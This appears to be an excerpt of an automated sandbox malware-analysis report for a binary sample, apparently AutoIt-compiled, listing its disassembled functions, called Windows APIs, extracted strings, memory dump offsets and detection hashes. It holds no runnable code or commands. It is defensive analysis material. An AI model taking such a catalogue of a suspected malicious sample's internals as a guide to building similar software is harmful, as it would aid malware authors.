                    • Opcode ID: 02edad6e3d3e53e74fcc0bca0291e7f23400eb84061cef255890456a862ff4fc
                    • Instruction ID: 16b51bc0635a072ee8d0a6205485d4f2ba0c81272ad19743ec254c0df6d868f2
                    • Opcode Fuzzy Hash: 02edad6e3d3e53e74fcc0bca0291e7f23400eb84061cef255890456a862ff4fc
                    • Instruction Fuzzy Hash: C2018F30800709ABEB315B20DC4EB9677B9BF00705F04476AF582A16E0DBE5A955CB84
                    Function 006813B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • EndPath.GDI32(?), ref: 006813BF
                    • StrokeAndFillPath.GDI32(?,?,006BBAD8,00000000,?), ref: 006813DB
                    • SelectObject.GDI32(?,00000000), ref: 006813EE
                    • DeleteObject.GDI32 ref: 00681401
                    • StrokePath.GDI32(?), ref: 0068141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: 8d56c0719dad1775eacabe662c518bd2531bd11bcb44200ab17482f979749fe5
                    • Instruction ID: b86385afae908935521eea7e95e6707b00d5a589075705f325700595aa33e221
                    • Opcode Fuzzy Hash: 8d56c0719dad1775eacabe662c518bd2531bd11bcb44200ab17482f979749fe5
                    • Instruction Fuzzy Hash: D9F0E174004308DBDB216F16EC0C7543FADA703326F04C326E429495F1C73949A6DF59
                    Function 006EC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 006EC69D
                    • CoCreateInstance.OLE32(00712D6C,00000000,00000001,00712BDC,?), ref: 006EC6B5
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                    • CoUninitialize.OLE32 ref: 006EC922
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CreateInitializeInstanceUninitialize_memmove
                    • String ID: .lnk
                    • API String ID: 2683427295-24824748
                    • Opcode ID: 35ee54a98bea009b05d0b0829e70b5ebe6d5bc62d7481ab72bf143c25d32e4be
                    • Instruction ID: ecfd39d162f925eb8de4e7009b96e5d322fcd736da54becb775895a88c82b15d
                    • Opcode Fuzzy Hash: 35ee54a98bea009b05d0b0829e70b5ebe6d5bc62d7481ab72bf143c25d32e4be
                    • Instruction Fuzzy Hash: 24A13B71108305AFD344FF54C881EABB7E9EF98704F044A1CF19697292DB70EA49CB66
                    Function 00692E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006A0FF6: std::exception::exception.LIBCMT ref: 006A102C
                      • Part of subcall function 006A0FF6: __CxxThrowException@8.LIBCMT ref: 006A1041
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 00687BB1: _memmove.LIBCMT ref: 00687C0B
                    • __swprintf.LIBCMT ref: 0069302D
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00692EC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: 7bd18bcbdf2e4b88822bfc0fbd4750415e42b7ab4a2bb42505d14e00ef15e1fc
                    • Instruction ID: d326c783ed7c4bb5735293d3126e9246ac792d50ab21ab40800502b143115a61
                    • Opcode Fuzzy Hash: 7bd18bcbdf2e4b88822bfc0fbd4750415e42b7ab4a2bb42505d14e00ef15e1fc
                    • Instruction Fuzzy Hash: 0D918C711083119FCB68FF24D885DBEB7AAEF85740F04491DF4929B2A1DB20EE45CB5A
                    Function 006DB7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                    Download Yara Rule
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 006DB981
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container$%q
                    • API String ID: 3565006973-3580070396
                    • Opcode ID: 57cd93db78881ecb8fc6cf2f709a140b127dcd6fdd2eab31a0b2892c7d60f158
                    • Instruction ID: 47d10913e17e1d47b0ebd072441a79e23f8fa7908cf76c4ddbb41b6922b4841c
                    • Opcode Fuzzy Hash: 57cd93db78881ecb8fc6cf2f709a140b127dcd6fdd2eab31a0b2892c7d60f158
                    • Instruction Fuzzy Hash: 6E915A70A00201DFDB64DF28C884AAAB7EAFF49710F15956EF94ACB795DB70E841CB50
                    Function 006A524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                    Download Yara Rule
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 006A52DD
                      • Part of subcall function 006B0340: __87except.LIBCMT ref: 006B037B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: 5fceed61d04e957787e79deb79337a047c2b448d86fe84dfbe0e34a8af0a83f3
                    • Instruction ID: cb6bd31e040f21534e5e532270a81af1ead8e0ec43172b53da628a5c15fb555b
                    • Opcode Fuzzy Hash: 5fceed61d04e957787e79deb79337a047c2b448d86fe84dfbe0e34a8af0a83f3
                    • Instruction Fuzzy Hash: 0A515CA1A08601C6EB14F718C9413EF2FD69B41750F208958E497413D5EF78CDD4DF99
                    Function 006A023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID: #$+
                    • API String ID: 0-2552117581
                    • Opcode ID: e62f6cfbbc5f4029655789433095f27f719eed0bc22c005e3437e2aebb3e4675
                    • Instruction ID: d9f67079b8349fb596984f151e27b23a4c4753725432fb6b2f9a8016817e3f61
                    • Opcode Fuzzy Hash: e62f6cfbbc5f4029655789433095f27f719eed0bc22c005e3437e2aebb3e4675
                    • Instruction Fuzzy Hash: 81512135904246DFDF25AF28C488AFA7BA7EF1A310F144056E8929B7A0D734DD42CB75
                    Function 00693297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove$_free
                    • String ID: Oai
                    • API String ID: 2620147621-3423572213
                    • Opcode ID: 0e96f3b33329dae4fdc3c7955f177cf53bf2ef41c4e655c2e79f68a718b2ad16
                    • Instruction ID: b14719224daed73df48baa02ecf45f78df9d43065fa4eb017caed2211ea5be06
                    • Opcode Fuzzy Hash: 0e96f3b33329dae4fdc3c7955f177cf53bf2ef41c4e655c2e79f68a718b2ad16
                    • Instruction Fuzzy Hash: 84514A716083519FDB64CF28C851B6BBBEAEF89314F05492DE98987351DB31EA01CF92
                    Function 006962F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: ERCP
                    • API String ID: 2532777613-1384759551
                    • Opcode ID: 2699012bbd84faa9bbe9ca63e89676dfb3d8219937521145643d4edab074a699
                    • Instruction ID: 37e2f50d8993ad70209c4355be0ee33f4a36eb4d4da4087f75c41cddc67cfa16
                    • Opcode Fuzzy Hash: 2699012bbd84faa9bbe9ca63e89676dfb3d8219937521145643d4edab074a699
                    • Instruction Fuzzy Hash: F351B271900709DBDB24CFA5C8817EABBFAEF04714F20856EE64ACB741E7759985CB80
                    Function 00707648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007076D0
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007076E4
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00707708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: 252e3362043c8999bfae93127b6aad6f1045c310bdeb993f640ffa12aa404b7c
                    • Instruction ID: c1968252ccc410afd6ca849e6eea13f4fbba976a60b66659a9e0528e8022375f
                    • Opcode Fuzzy Hash: 252e3362043c8999bfae93127b6aad6f1045c310bdeb993f640ffa12aa404b7c
                    • Instruction Fuzzy Hash: DC219F32500219EBDF25CEA4CC46FEA3BA9EF48754F110214FE156B1D0DABAB851CBA0
                    Function 00706F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00706FAA
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00706FBA
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00706FDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    • Opcode ID: 073883a9621dfcb3af5777ebfc699afee5dc557c810a2d746979ac06efb70227
                    • Instruction ID: 1fea3150ce103381770642f5bd6d27893412c9aaf5969aa6d31a36755596ecd4
                    • Opcode Fuzzy Hash: 073883a9621dfcb3af5777ebfc699afee5dc557c810a2d746979ac06efb70227
                    • Instruction Fuzzy Hash: 49219532610119FFDF119F54DC85FAB37EAEF89754F018224FA149B1D0CA75AC6287A0
                    Function 0070797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007079E1
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007079F6
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00707A03
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: fc43d0d053f832d99bdc4604a0b0589a9bfcd0c510c9e4a17a58ee5e6ebf32f8
                    • Instruction ID: 89b003ed8d6555501484392bdf7b8e161fc4c617217cf25535d6b7fc6abe9b4e
                    • Opcode Fuzzy Hash: fc43d0d053f832d99bdc4604a0b0589a9bfcd0c510c9e4a17a58ee5e6ebf32f8
                    • Instruction Fuzzy Hash: 8211E372654208FAEF249F74CC05FAB37A9EF89B64F014619FA41A60D0D676A811CB60
                    Function 00690A8D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00683C26,007462F8,?,?,?), ref: 00690ACE
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    • _wcscat.LIBCMT ref: 006C50E1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FullNamePath_memmove_wcscat
                    • String ID: X<$ct
                    • API String ID: 257928180-3612926602
                    • Opcode ID: 6c5a2194893f4e7b376924f921c5575c65cafb88a698358f915969774e951d0a
                    • Instruction ID: 2d70de173ba774536c7390fb2652a7757e0ef816cfa9b0dc41ec8054376b7a6e
                    • Opcode Fuzzy Hash: 6c5a2194893f4e7b376924f921c5575c65cafb88a698358f915969774e951d0a
                    • Instruction Fuzzy Hash: E411A135A042089ECF90FBA4CC01ED973FEEF09350B1041A9B94CD7685EB74EB868B19
                    Function 00684C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00684C2E), ref: 00684CA3
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00684CB5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: e69cdb594adf658b1cc6309ba32a883533499e2c07f186504ce76c0f29f50fbe
                    • Instruction ID: ac7585737b16e6c1e1505d8a05cbd6c7a5ed90893dbb7f663f235a8561a0903f
                    • Opcode Fuzzy Hash: e69cdb594adf658b1cc6309ba32a883533499e2c07f186504ce76c0f29f50fbe
                    • Instruction Fuzzy Hash: 39D017B0511727CFD730AF31DA18A4676EAAF05791B11CA3AD886D6A90EA78D880CB50
                    Function 00684D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00684D2E,?,00684F4F,?,007462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00684D6F
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00684D81
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: 59793315a6f675a7715deddd86d2a76663ca2f4f34fed2c9ea0ab38ff01d9259
                    • Instruction ID: 954ec9cdff32f2d30f3ba40b5d09e4ec32d3a37ee737dd459159b66e56df0a8d
                    • Opcode Fuzzy Hash: 59793315a6f675a7715deddd86d2a76663ca2f4f34fed2c9ea0ab38ff01d9259
                    • Instruction Fuzzy Hash: 87D017B0550717CFD730AF31D80865676EABF15352B11CE3AD886D6B90EA78D880CB50
                    Function 00684D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00684CE1,?), ref: 00684DA2
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00684DB4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: 596797151858be364ddb352878b4d9d1e1b4dab170018a3896695587627311cd
                    • Instruction ID: 8d1ab26cee2f7bc41937e33b765c7405fe471ee7501f96eee19eb58d5f0425b4
                    • Opcode Fuzzy Hash: 596797151858be364ddb352878b4d9d1e1b4dab170018a3896695587627311cd
                    • Instruction Fuzzy Hash: F8D017B1550717CFD730AF31D808A8676E6AF09355B11CA3AD8C6D6A90EB78D880CB50
                    Function 00701072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,007012C1), ref: 00701080
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00701092
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    • Opcode ID: 0292632b9f6e86c51ba8b2a18d75bff7d9946c8c9aef3e5444cac98edf4b9a52
                    • Instruction ID: 9ce4f62413c57a907e6982cba6cef4af32876e3a2770308e3758ead23d900423
                    • Opcode Fuzzy Hash: 0292632b9f6e86c51ba8b2a18d75bff7d9946c8c9aef3e5444cac98edf4b9a52
                    • Instruction Fuzzy Hash: A7D01770510716CFE7309F35E818A1B76E4AF09361F11CE3AE8CADA590EB78C8C0CA50
                    Function 006F93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,006F9009,?,0070F910), ref: 006F9403
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006F9415
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    • Opcode ID: b64c31e8e25c358afd9b10a2a7e2fae31392f10a0caba92f606d9835efccdad3
                    • Instruction ID: 061c2f78b87ede01b4b5e85f7208d0b3f958b90cb14a237508fd2e2547d25b55
                    • Opcode Fuzzy Hash: b64c31e8e25c358afd9b10a2a7e2fae31392f10a0caba92f606d9835efccdad3
                    • Instruction Fuzzy Hash: 64D0C7B050071BCFDB318F31C90825272E6BF16341B00C83AE482C2A90EA78C8C0CA60
                    Function 006FE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 006FE3D2
                    • CharLowerBuffW.USER32(?,?), ref: 006FE415
